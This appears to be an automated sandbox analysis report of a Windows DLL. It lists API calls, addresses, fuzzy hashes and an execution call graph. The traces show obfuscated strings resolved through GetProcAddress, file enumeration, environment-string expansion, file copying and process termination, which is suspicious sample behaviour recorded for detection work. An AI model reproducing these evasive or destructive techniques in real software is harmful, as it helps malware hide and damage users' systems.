              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6BEE5601
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              APIs
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              APIs
              Strings
              • kernel32.dll, xrefs: 6BEE1755
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6BEE1765
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6BEE17F6
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6BEE1887
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              APIs
                • Part of subcall function 6BEF7FC0: CreateFileW.KERNEL32(00000000,00000000,?,6BEF8322,?,?,00000000,?,6BEF8322,00000000,0000000C), ref: 6BEF7FDD
              • GetLastError.KERNEL32 ref: 6BEF838D
              • __dosmaperr.LIBCMT ref: 6BEF8394
              • GetFileType.KERNEL32(00000000), ref: 6BEF83A0
              • GetLastError.KERNEL32 ref: 6BEF83AA
              • __dosmaperr.LIBCMT ref: 6BEF83B3
              • CloseHandle.KERNEL32(00000000), ref: 6BEF83D3
              • CloseHandle.KERNEL32(00000000), ref: 6BEF8520
              • GetLastError.KERNEL32 ref: 6BEF8552
              • __dosmaperr.LIBCMT ref: 6BEF8559
              Strings
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6BEE6BF9
              • ___TypeMatch.LIBVCRUNTIME ref: 6BEE6D07
              • _UnwindNestedFrames.LIBCMT ref: 6BEE6E59
              • CallUnexpected.LIBVCRUNTIME ref: 6BEE6E74
              Strings
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              APIs
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 6BEE6577
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6BEE657F
              • _ValidateLocalCookies.LIBCMT ref: 6BEE6608
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6BEE6633
              • _ValidateLocalCookies.LIBCMT ref: 6BEE6688
              Strings
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
              • String ID: csm
              • API String ID: 1170836740-1018135373
              APIs
              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,6BEEC75A,?,316303B8,?,6BEF1812,6BEE7D84,B586E81C,00000000,6BEEC75A), ref: 6BEF17C4
              Strings
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              APIs
              • GetLastError.KERNEL32(?,?,6BEE6721,6BEE51C4,6BEE4B74), ref: 6BEE67B1
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6BEE67BF
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6BEE67D8
              • SetLastError.KERNEL32(00000000,?,6BEE6721,6BEE51C4,6BEE4B74), ref: 6BEE682A
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              Strings
              • C:\Windows\system32\loaddll32.exe, xrefs: 6BEF3E14
              Similarity
              • API ID:
              • String ID: C:\Windows\system32\loaddll32.exe
              • API String ID: 0-1062229814
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,316303B8,6BEEC75A,?,00000000,6BEFC710,000000FF,?,6BEEE3C3,B586E81C,?,6BEEE397,?), ref: 6BEEE45E
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6BEEE470
              • FreeLibrary.KERNEL32(00000000,?,00000000,6BEFC710,000000FF,?,6BEEE3C3,B586E81C,?,6BEEE397,?), ref: 6BEEE492
              Strings
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              APIs
              • __alloca_probe_16.LIBCMT ref: 6BEF8D79
              • __alloca_probe_16.LIBCMT ref: 6BEF8E42
              • __freea.LIBCMT ref: 6BEF8EA9
                • Part of subcall function 6BEF047E: RtlAllocateHeap.NTDLL(00000000,6BEF4371,7D32887D), ref: 6BEF04B0
              • __freea.LIBCMT ref: 6BEF8EBC
              • __freea.LIBCMT ref: 6BEF8EC9
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocateHeap
              • String ID:
              • API String ID: 1423051803-0
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6BEE7863,?,?,00000001,?,?,?,6BEE7952,00000001,FlsFree,6BEFDCE0,FlsFree), ref: 6BEE78BF
              • GetLastError.KERNEL32(?,6BEE7863,?,?,00000001,?,?,?,6BEE7952,00000001,FlsFree,6BEFDCE0,FlsFree,?,?,6BEE6878), ref: 6BEE78C9
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6BEE78F1
              Strings
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: e4d7344decf3d80a19337009759a7b662bf7b7c126029881f08376ed68de5b19
              • Instruction ID: 07185dbae65f75843e6633be9cd50c49f515a44a82db695cad948756904bf4c0
              • Opcode Fuzzy Hash: e4d7344decf3d80a19337009759a7b662bf7b7c126029881f08376ed68de5b19
              • Instruction Fuzzy Hash: 3FE04F3468430EB7EF011A70EC06B493F6AAF41B44F308070FA0EE8192EB69D463D5A8
              APIs
              • GetConsoleOutputCP.KERNEL32(316303B8,00000000,00000000,?), ref: 6BEF2649
                • Part of subcall function 6BEF4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6BEF8E9F,?,00000000,-00000008), ref: 6BEF49A6
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6BEF289B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6BEF28E1
              • GetLastError.KERNEL32 ref: 6BEF2984
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: 645bdfdbcaf703caa415445000137a77293ea4f3e6cd21040eec0e0a41cec58a
              • Instruction ID: eea9ee77f1fa0ac37a4e8ae47c65b12bb0e48bab9328c1ef689e47554b433a08
              • Opcode Fuzzy Hash: 645bdfdbcaf703caa415445000137a77293ea4f3e6cd21040eec0e0a41cec58a
              • Instruction Fuzzy Hash: 70D16975D042999FCF05CFA8C880AEDBBB9FF09314F28816AE455AB351E734A946CB50
              APIs
              Similarity
              • API ID: AdjustPointer
              • String ID:
              • API String ID: 1740715915-0
              • Opcode ID: d2ef2fcfa08cab07a60068094c01ebc37909509befd1c5ee313db48a312f3af5
              • Instruction ID: 9278f3363983327ae51e5042e11455b82848e12c66c4dd19108e8ffcfbfff2e2
              • Opcode Fuzzy Hash: d2ef2fcfa08cab07a60068094c01ebc37909509befd1c5ee313db48a312f3af5
              • Instruction Fuzzy Hash: 05510272A00702AFEB148F65C841B6A77B5FF44718F30456DDA15472A0EB3AE8A3C7B0
              APIs
                • Part of subcall function 6BEF4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6BEF8E9F,?,00000000,-00000008), ref: 6BEF49A6
              • GetLastError.KERNEL32 ref: 6BEF36F8
              • __dosmaperr.LIBCMT ref: 6BEF36FF
              • GetLastError.KERNEL32(?,?,?,?), ref: 6BEF3739
              • __dosmaperr.LIBCMT ref: 6BEF3740
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: 0c49434107f1adf2201ef23b8f59de0fed83fc9a83f8d390396a1df39a1ed216
              • Instruction ID: c0742dea000de2b12f42e4f4bd084e5f863bf142917a27495539239e83d96cfa
              • Opcode Fuzzy Hash: 0c49434107f1adf2201ef23b8f59de0fed83fc9a83f8d390396a1df39a1ed216
              • Instruction Fuzzy Hash: 7E21DA71604205AFDB309FB5C88095BB7BDEF01368720865DE91997740D73CEC138BA2
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6BEF49F0
                • Part of subcall function 6BEF4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6BEF8E9F,?,00000000,-00000008), ref: 6BEF49A6
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BEF4A28
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BEF4A48
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: dd6919b014582d8076a9900fcc1989a445e57d54395619ca5e6b5d542788ef0c
              • Instruction ID: 8d06a80680174a92215259c5c1cbad4c1829fa67e82f00248b9b25abbf8cf19f
              • Opcode Fuzzy Hash: dd6919b014582d8076a9900fcc1989a445e57d54395619ca5e6b5d542788ef0c
              • Instruction Fuzzy Hash: EE1126B6A009097F6B115BB69EC9C6F2EBDCEC62AC320402AF901D1201FB6CCF038175
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6BEED16B,00000000,00000000,?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000), ref: 6BEF9F64
              • GetLastError.KERNEL32(?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000,?,?,?,6BEF2FB2,00000000), ref: 6BEF9F70
                • Part of subcall function 6BEF9F36: CloseHandle.KERNEL32(FFFFFFFE,6BEF9F80,?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000,?,?), ref: 6BEF9F46
              • ___initconout.LIBCMT ref: 6BEF9F80
                • Part of subcall function 6BEF9EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6BEF9F27,6BEF85CE,?,?,6BEF29D8,?,00000000,00000000,?), ref: 6BEF9F0B
              • WriteConsoleW.KERNEL32(00000000,00000000,6BEED16B,00000000,?,6BEF85E1,00000000,00000001,?,?,?,6BEF29D8,?,00000000,00000000,?), ref: 6BEF9F95
              Similarity
              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
              • String ID:
              • API String ID: 2744216297-0
              • Opcode ID: 9f66d56b1d02a20b6ddecbb132e98efb5f6b809b93716b6d65474d50d18109a7
              • Instruction ID: b596129ca9fee8d9be0ebf60571222373f52587979f4dec35f617ab38b1289b0
              • Opcode Fuzzy Hash: 9f66d56b1d02a20b6ddecbb132e98efb5f6b809b93716b6d65474d50d18109a7
              • Instruction Fuzzy Hash: 87F01C3F550119BBCF221FD1DC08A9A3F6BFB493A5B104014FA5985130D736C821EB91
              APIs
              Strings
              Similarity
              • API ID: __aulldiv
              • String ID: +$-
              • API String ID: 3732870572-2137968064
              • Opcode ID: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction ID: 92172682d664e1778ced58846db2e6d4903edcf480fcc7953dd04ca5bb50d6b9
              • Opcode Fuzzy Hash: f256cc07467344d5823d9b5aafbfa4d5866cd55d923b229930bfc182ace8684e
              • Instruction Fuzzy Hash: 6EA1C131F44258AEDB14CE78C8507EE7FB5AB46728F248599E8A5AB380D339D503CB70
              APIs
              • RtlEncodePointer.NTDLL(00000000), ref: 6BEE6EA4
              Strings
              Similarity
              • API ID: EncodePointer
              • String ID: MOC$RCC
              • API String ID: 2118026453-2084237596
              • Opcode ID: f5c5c653899211d2c3f0c51b465975acb247b58a59ca5e43efa1b41fe6f978e6
              • Instruction ID: 07c59fc63bb1d3b56803c1f0135bc25db77e4cf88901a78061eb46decf4d5a73
              • Opcode Fuzzy Hash: f5c5c653899211d2c3f0c51b465975acb247b58a59ca5e43efa1b41fe6f978e6
              • Instruction Fuzzy Hash: 41413E71900209AFDF05CFA4CC81ADE7BB6FF48308F258199FA186B255D339D962DB61

              Execution Graph

              Execution Coverage:3%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:2000
              Total number of Limit Nodes:29
16238->16242 16240 6fe71930 __dosmaperr 6 API calls 16239->16240 16241 6fe6f47c 16240->16241 16241->16242 16243 6fe7196f __dosmaperr 6 API calls 16241->16243 16242->16235 16244 6fe6f48f 16243->16244 16246 6fe6f332 16244->16246 16247 6fe6f34d 16246->16247 16248 6fe6f33d 16246->16248 16247->16242 16252 6fe6f353 16248->16252 16251 6fe70444 ___free_lconv_mon 14 API calls 16251->16247 16253 6fe6f36e 16252->16253 16254 6fe6f368 16252->16254 16256 6fe70444 ___free_lconv_mon 14 API calls 16253->16256 16255 6fe70444 ___free_lconv_mon 14 API calls 16254->16255 16255->16253 16257 6fe6f37a 16256->16257 16258 6fe70444 ___free_lconv_mon 14 API calls 16257->16258 16259 6fe6f385 16258->16259 16260 6fe70444 ___free_lconv_mon 14 API calls 16259->16260 16261 6fe6f390 16260->16261 16262 6fe70444 ___free_lconv_mon 14 API calls 16261->16262 16263 6fe6f39b 16262->16263 16264 6fe70444 ___free_lconv_mon 14 API calls 16263->16264 16265 6fe6f3a6 16264->16265 16266 6fe70444 ___free_lconv_mon 14 API calls 16265->16266 16267 6fe6f3b1 16266->16267 16268 6fe70444 ___free_lconv_mon 14 API calls 16267->16268 16269 6fe6f3bc 16268->16269 16270 6fe70444 ___free_lconv_mon 14 API calls 16269->16270 16271 6fe6f3c7 16270->16271 16272 6fe70444 ___free_lconv_mon 14 API calls 16271->16272 16273 6fe6f3d5 16272->16273 16278 6fe6f17f 16273->16278 16279 6fe6f18b __FrameHandler3::FrameUnwindToState 16278->16279 16294 6fe7351f RtlEnterCriticalSection 16279->16294 16281 6fe6f1bf 16295 6fe6f1de 16281->16295 16283 6fe6f195 16283->16281 16285 6fe70444 ___free_lconv_mon 14 API calls 16283->16285 16285->16281 16286 6fe6f1ea 16287 6fe6f1f6 __FrameHandler3::FrameUnwindToState 16286->16287 16299 6fe7351f RtlEnterCriticalSection 16287->16299 16289 6fe6f200 16290 6fe6f420 __dosmaperr 14 API calls 16289->16290 16291 6fe6f213 16290->16291 16300 6fe6f233 16291->16300 16294->16283 16298 6fe73567 RtlLeaveCriticalSection 16295->16298 16297 6fe6f1cc 16297->16286 16298->16297 16299->16289 16303 6fe73567 RtlLeaveCriticalSection 
16300->16303 16302 6fe6f221 16302->16251 16303->16302 16305 6fe651e8 16304->16305 16306 6fe66774 16304->16306 16305->16043 16312 6fe67973 16306->16312 16309 6fe679ae ___vcrt_FlsSetValue 6 API calls 16310 6fe6678a 16309->16310 16317 6fe6674e 16310->16317 16313 6fe67812 ___vcrt_InitializeCriticalSectionEx 5 API calls 16312->16313 16314 6fe6798d 16313->16314 16315 6fe679a5 TlsGetValue 16314->16315 16316 6fe6677b 16314->16316 16315->16316 16316->16309 16318 6fe66765 16317->16318 16319 6fe66758 16317->16319 16318->16305 16319->16318 16320 6fe6d5ab ___std_exception_destroy 14 API calls 16319->16320 16320->16318 16327 6fe667a3 16321->16327 16323 6fe651c4 16323->16072 16324 6fe6ecb3 16323->16324 16325 6fe6f5e8 __dosmaperr 14 API calls 16324->16325 16326 6fe651d0 16325->16326 16326->16070 16326->16071 16328 6fe667af GetLastError 16327->16328 16329 6fe667ac 16327->16329 16330 6fe67973 ___vcrt_FlsGetValue 6 API calls 16328->16330 16329->16323 16331 6fe667c4 16330->16331 16332 6fe667e3 16331->16332 16333 6fe66829 SetLastError 16331->16333 16334 6fe679ae ___vcrt_FlsSetValue 6 API calls 16331->16334 16332->16333 16333->16323 16335 6fe667dd _unexpected 16334->16335 16335->16332 16336 6fe66805 16335->16336 16337 6fe679ae ___vcrt_FlsSetValue 6 API calls 16335->16337 16338 6fe679ae ___vcrt_FlsSetValue 6 API calls 16336->16338 16339 6fe66819 16336->16339 16337->16336 16338->16339 16340 6fe6d5ab ___std_exception_destroy 14 API calls 16339->16340 16340->16332 18244 6fe6cc31 18245 6fe71e26 ___scrt_uninitialize_crt 68 API calls 18244->18245 18246 6fe6cc39 18245->18246 18254 6fe71ad4 18246->18254 18248 6fe6cc3e 18249 6fe71e2f __DllMainCRTStartup@12 14 API calls 18248->18249 18250 6fe6cc4d RtlDeleteCriticalSection 18249->18250 18250->18248 18251 6fe6cc68 18250->18251 18252 6fe70444 ___free_lconv_mon 14 API calls 18251->18252 18253 6fe6cc73 18252->18253 18255 6fe71ae0 __FrameHandler3::FrameUnwindToState 18254->18255 18264 6fe7351f RtlEnterCriticalSection 18255->18264 18257 6fe71b57 18265 
6fe71b76 18257->18265 18260 6fe71b2b RtlDeleteCriticalSection 18261 6fe70444 ___free_lconv_mon 14 API calls 18260->18261 18263 6fe71aeb 18261->18263 18262 6fe6cec7 __DllMainCRTStartup@12 69 API calls 18262->18263 18263->18257 18263->18260 18263->18262 18264->18263 18268 6fe73567 RtlLeaveCriticalSection 18265->18268 18267 6fe71b63 18267->18248 18268->18267 17348 6fe6633a 17351 6fe66388 17348->17351 17352 6fe66345 17351->17352 17353 6fe66391 17351->17353 17353->17352 17360 6fe66795 17353->17360 17356 6fe66795 _unexpected 49 API calls 17357 6fe663d7 17356->17357 17374 6fe6ed08 17357->17374 17361 6fe667a3 _unexpected 23 API calls 17360->17361 17362 6fe6679a 17361->17362 17363 6fe663cc 17362->17363 17380 6fe74c7b 17362->17380 17363->17356 17366 6fe6ed54 17368 6fe6ed5e IsProcessorFeaturePresent 17366->17368 17373 6fe6ed7d 17366->17373 17370 6fe6ed6a 17368->17370 17372 6fe6dcfd _unexpected 8 API calls 17370->17372 17372->17373 17410 6fe6e4c9 17373->17410 17375 6fe6ed14 __FrameHandler3::FrameUnwindToState 17374->17375 17376 6fe6f497 _unexpected 39 API calls 17375->17376 17379 6fe6ed19 17376->17379 17377 6fe6ed44 CallUnexpected 39 API calls 17378 6fe6ed43 17377->17378 17379->17377 17413 6fe74ba9 17380->17413 17383 6fe74cc0 17386 6fe74ccc __FrameHandler3::FrameUnwindToState 17383->17386 17384 6fe6f5e8 __dosmaperr 14 API calls 17392 6fe74cfd _unexpected 17384->17392 17385 6fe74d1c 17388 6fe70431 __dosmaperr 14 API calls 17385->17388 17386->17384 17386->17385 17387 6fe74d2e _unexpected 17386->17387 17386->17392 17389 6fe74d64 _unexpected 17387->17389 17424 6fe7351f RtlEnterCriticalSection 17387->17424 17390 6fe74d21 17388->17390 17395 6fe74da1 17389->17395 17396 6fe74e9e 17389->17396 17406 6fe74dcf 17389->17406 17393 6fe6def9 ___std_exception_copy 39 API calls 17390->17393 17392->17385 17392->17387 17409 6fe74d06 17392->17409 17393->17409 17401 6fe6f497 _unexpected 39 API calls 17395->17401 17395->17406 17397 6fe74ea9 17396->17397 17429 6fe73567 RtlLeaveCriticalSection 
17396->17429 17400 6fe6e4c9 _unexpected 21 API calls 17397->17400 17402 6fe74eb1 17400->17402 17404 6fe74dc4 17401->17404 17403 6fe6f497 _unexpected 39 API calls 17407 6fe74e24 17403->17407 17405 6fe6f497 _unexpected 39 API calls 17404->17405 17405->17406 17425 6fe74e4a 17406->17425 17408 6fe6f497 _unexpected 39 API calls 17407->17408 17407->17409 17408->17409 17409->17366 17431 6fe6e306 17410->17431 17414 6fe74bb5 __FrameHandler3::FrameUnwindToState 17413->17414 17419 6fe7351f RtlEnterCriticalSection 17414->17419 17416 6fe74bc3 17420 6fe74c05 17416->17420 17419->17416 17423 6fe73567 RtlLeaveCriticalSection 17420->17423 17422 6fe6ed49 17422->17366 17422->17383 17423->17422 17424->17389 17426 6fe74e4e 17425->17426 17428 6fe74e16 17425->17428 17430 6fe73567 RtlLeaveCriticalSection 17426->17430 17428->17403 17428->17407 17428->17409 17429->17397 17430->17428 17432 6fe6e333 17431->17432 17441 6fe6e344 17431->17441 17442 6fe6e3ce GetModuleHandleW 17432->17442 17437 6fe6e382 17449 6fe6e1d1 17441->17449 17443 6fe6e338 17442->17443 17443->17441 17444 6fe6e429 GetModuleHandleExW 17443->17444 17445 6fe6e468 GetProcAddress 17444->17445 17446 6fe6e47c 17444->17446 17445->17446 17447 6fe6e48f FreeLibrary 17446->17447 17448 6fe6e498 17446->17448 17447->17448 17448->17441 17450 6fe6e1dd __FrameHandler3::FrameUnwindToState 17449->17450 17464 6fe7351f RtlEnterCriticalSection 17450->17464 17452 6fe6e1e7 17465 6fe6e21e 17452->17465 17454 6fe6e1f4 17469 6fe6e212 17454->17469 17457 6fe6e39d 17494 6fe6e410 17457->17494 17459 6fe6e3a7 17460 6fe6e3bb 17459->17460 17461 6fe6e3ab GetCurrentProcess TerminateProcess 17459->17461 17462 6fe6e429 _unexpected 3 API calls 17460->17462 17461->17460 17463 6fe6e3c3 ExitProcess 17462->17463 17464->17452 17466 6fe6e22a __FrameHandler3::FrameUnwindToState _unexpected 17465->17466 17468 6fe6e28e _unexpected 17466->17468 17472 6fe6eb1d 17466->17472 17468->17454 17493 6fe73567 RtlLeaveCriticalSection 17469->17493 17471 6fe6e200 17471->17437 17471->17457 
17473 6fe6eb29 __EH_prolog3 17472->17473 17476 6fe6e9e8 17473->17476 17475 6fe6eb50 _unexpected 17475->17468 17477 6fe6e9f4 __FrameHandler3::FrameUnwindToState 17476->17477 17484 6fe7351f RtlEnterCriticalSection 17477->17484 17479 6fe6ea02 17485 6fe6ea43 17479->17485 17484->17479 17486 6fe6ea62 17485->17486 17487 6fe6ea0f 17485->17487 17486->17487 17488 6fe70444 ___free_lconv_mon 14 API calls 17486->17488 17489 6fe6ea37 17487->17489 17488->17487 17492 6fe73567 RtlLeaveCriticalSection 17489->17492 17491 6fe6ea20 17491->17475 17492->17491 17493->17471 17497 6fe735a3 17494->17497 17496 6fe6e415 _unexpected 17496->17459 17498 6fe735b2 _unexpected 17497->17498 17499 6fe735bf 17498->17499 17501 6fe71853 17498->17501 17499->17496 17502 6fe717ce __dosmaperr 5 API calls 17501->17502 17503 6fe7186f 17502->17503 17503->17499 16341 6fe64e89 16342 6fe64e97 16341->16342 16343 6fe64e92 16341->16343 16347 6fe64d53 16342->16347 16361 6fe6508a 16343->16361 16348 6fe64d5f __FrameHandler3::FrameUnwindToState 16347->16348 16349 6fe64d88 dllmain_raw 16348->16349 16350 6fe64d83 16348->16350 16358 6fe64d6e 16348->16358 16351 6fe64da2 dllmain_crt_dispatch 16349->16351 16349->16358 16365 6fe61000 16350->16365 16351->16350 16351->16358 16362 6fe650a0 16361->16362 16364 6fe650a9 16362->16364 16460 6fe6503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16362->16460 16364->16342 16366 6fe61012 16365->16366 16367 6fe61010 16365->16367 16370 6fe64402 16366->16370 16371 6fe64430 __fread_nolock 16370->16371 16416 6fe6171f 16371->16416 16374 6fe61135 __DllMainCRTStartup@12 44 API calls 16375 6fe64456 __DllMainCRTStartup@12 _strlen 16374->16375 16376 6fe61075 __DllMainCRTStartup@12 43 API calls 16375->16376 16377 6fe644ae 16376->16377 16378 6fe6d5ab ___std_exception_destroy 14 API calls 16377->16378 16379 6fe644b9 GetEnvironmentVariableW 16378->16379 16380 6fe61135 __DllMainCRTStartup@12 44 API calls 16379->16380 16381 6fe644e6 __DllMainCRTStartup@12 _strlen 
16380->16381 16382 6fe61075 __DllMainCRTStartup@12 43 API calls 16381->16382 16383 6fe64545 16382->16383 16384 6fe6d5ab ___std_exception_destroy 14 API calls 16383->16384 16385 6fe64550 16384->16385 16386 6fe61135 __DllMainCRTStartup@12 44 API calls 16385->16386 16387 6fe64567 __DllMainCRTStartup@12 _strlen 16386->16387 16388 6fe61075 __DllMainCRTStartup@12 43 API calls 16387->16388 16389 6fe645bc 16388->16389 16390 6fe6d5ab ___std_exception_destroy 14 API calls 16389->16390 16391 6fe645c7 16390->16391 16392 6fe61135 __DllMainCRTStartup@12 44 API calls 16391->16392 16393 6fe645de __DllMainCRTStartup@12 _strlen 16392->16393 16394 6fe61075 __DllMainCRTStartup@12 43 API calls 16393->16394 16395 6fe64636 16394->16395 16396 6fe6d5ab ___std_exception_destroy 14 API calls 16395->16396 16458 6fe66180 16416->16458 16419 6fe61135 __DllMainCRTStartup@12 44 API calls 16420 6fe61775 __DllMainCRTStartup@12 _strlen 16419->16420 16421 6fe617d8 GetProcAddress 16420->16421 16422 6fe6d5ab ___std_exception_destroy 14 API calls 16421->16422 16423 6fe617f5 16422->16423 16424 6fe61135 __DllMainCRTStartup@12 44 API calls 16423->16424 16425 6fe61806 __DllMainCRTStartup@12 _strlen 16424->16425 16426 6fe61869 GetProcAddress 16425->16426 16427 6fe6d5ab ___std_exception_destroy 14 API calls 16426->16427 16428 6fe61886 16427->16428 16429 6fe61135 __DllMainCRTStartup@12 44 API calls 16428->16429 16430 6fe61897 __DllMainCRTStartup@12 _strlen 16429->16430 16431 6fe618fa GetProcAddress 16430->16431 16432 6fe6d5ab ___std_exception_destroy 14 API calls 16431->16432 16433 6fe61917 16432->16433 16434 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16433->16434 16435 6fe61927 16434->16435 16435->16374 16459 6fe6174a GetModuleHandleW 16458->16459 16459->16419 16460->16364 13867 6fe61c1a 13868 6fe61c21 13867->13868 13869 6fe61fbf 13868->13869 13878 6fe61c2b 13868->13878 14271 6fe632d8 13869->14271 13871 6fe61c47 13872 6fe61fd2 13873 6fe632d8 __DllMainCRTStartup@12 39 API calls 
13872->13873 13874 6fe61fe1 13873->13874 14274 6fe64ad5 13874->14274 13877 6fe61fa5 FindNextFileW 13877->13871 13877->13878 13878->13871 13878->13877 13887 6fe61d10 __DllMainCRTStartup@12 _strlen 13878->13887 13902 6fe61075 13878->13902 13905 6fe61b85 13878->13905 13879 6fe61ffc 13881 6fe61075 __DllMainCRTStartup@12 43 API calls 13883 6fe61f5e TerminateProcess CloseHandle CloseHandle 13881->13883 14228 6fe62004 13883->14228 13886 6fe61075 __DllMainCRTStartup@12 43 API calls 13886->13887 13887->13881 13887->13886 13943 6fe61135 13887->13943 13946 6fe6d5ab 13887->13946 13893 6fe632d8 39 API calls __DllMainCRTStartup@12 13898 6fe61db2 13893->13898 13895 6fe63389 __DllMainCRTStartup@12 40 API calls 13895->13898 13896 6fe633f1 40 API calls __DllMainCRTStartup@12 13896->13898 13898->13893 13898->13895 13898->13896 13900 6fe61075 __DllMainCRTStartup@12 43 API calls 13898->13900 13953 6fe63854 13898->13953 13956 6fe632f1 13898->13956 13960 6fe632c2 13898->13960 13963 6fe616ba 13898->13963 13967 6fe62430 CoInitialize 13898->13967 13901 6fe61e9a CopyFileW TerminateProcess CloseHandle CloseHandle 13900->13901 13901->13878 14281 6fe61035 13902->14281 13906 6fe61bca __DllMainCRTStartup@12 13905->13906 13907 6fe61075 __DllMainCRTStartup@12 43 API calls 13906->13907 13908 6fe61bfd FindFirstFileW 13907->13908 13909 6fe61c21 13908->13909 13910 6fe61fbf 13909->13910 13920 6fe61c2b 13909->13920 13911 6fe632d8 __DllMainCRTStartup@12 39 API calls 13910->13911 13913 6fe61fd2 13911->13913 13912 6fe61c47 13912->13878 13914 6fe632d8 __DllMainCRTStartup@12 39 API calls 13913->13914 13915 6fe61fe1 13914->13915 13917 6fe64ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13915->13917 13916 6fe61075 __DllMainCRTStartup@12 43 API calls 13916->13920 13919 6fe61ffc 13917->13919 13918 6fe61fa5 FindNextFileW 13918->13912 13918->13920 13919->13878 13920->13912 13920->13916 13920->13918 13921 6fe61b85 __DllMainCRTStartup@12 92 API calls 13920->13921 13928 6fe61d10 
__DllMainCRTStartup@12 _strlen 13920->13928 13921->13920 13922 6fe61075 __DllMainCRTStartup@12 43 API calls 13924 6fe61f5e TerminateProcess CloseHandle CloseHandle 13922->13924 13923 6fe61135 __DllMainCRTStartup@12 44 API calls 13923->13928 13925 6fe62004 __DllMainCRTStartup@12 81 API calls 13924->13925 13926 6fe61fa3 13925->13926 13926->13918 13927 6fe61075 __DllMainCRTStartup@12 43 API calls 13927->13928 13928->13922 13928->13923 13928->13927 13929 6fe6d5ab ___std_exception_destroy 14 API calls 13928->13929 13930 6fe61d89 ExpandEnvironmentStringsW 13929->13930 13931 6fe63389 __DllMainCRTStartup@12 40 API calls 13930->13931 13940 6fe61db2 13931->13940 13932 6fe63854 __DllMainCRTStartup@12 40 API calls 13932->13940 13933 6fe632f1 __DllMainCRTStartup@12 39 API calls 13933->13940 13934 6fe632d8 39 API calls __DllMainCRTStartup@12 13934->13940 13935 6fe632c2 __DllMainCRTStartup@12 40 API calls 13935->13940 13936 6fe63389 __DllMainCRTStartup@12 40 API calls 13936->13940 13937 6fe633f1 40 API calls __DllMainCRTStartup@12 13937->13940 13938 6fe616ba __DllMainCRTStartup@12 39 API calls 13938->13940 13939 6fe62430 __DllMainCRTStartup@12 78 API calls 13939->13940 13940->13932 13940->13933 13940->13934 13940->13935 13940->13936 13940->13937 13940->13938 13940->13939 13941 6fe61075 __DllMainCRTStartup@12 43 API calls 13940->13941 13942 6fe61e9a CopyFileW TerminateProcess 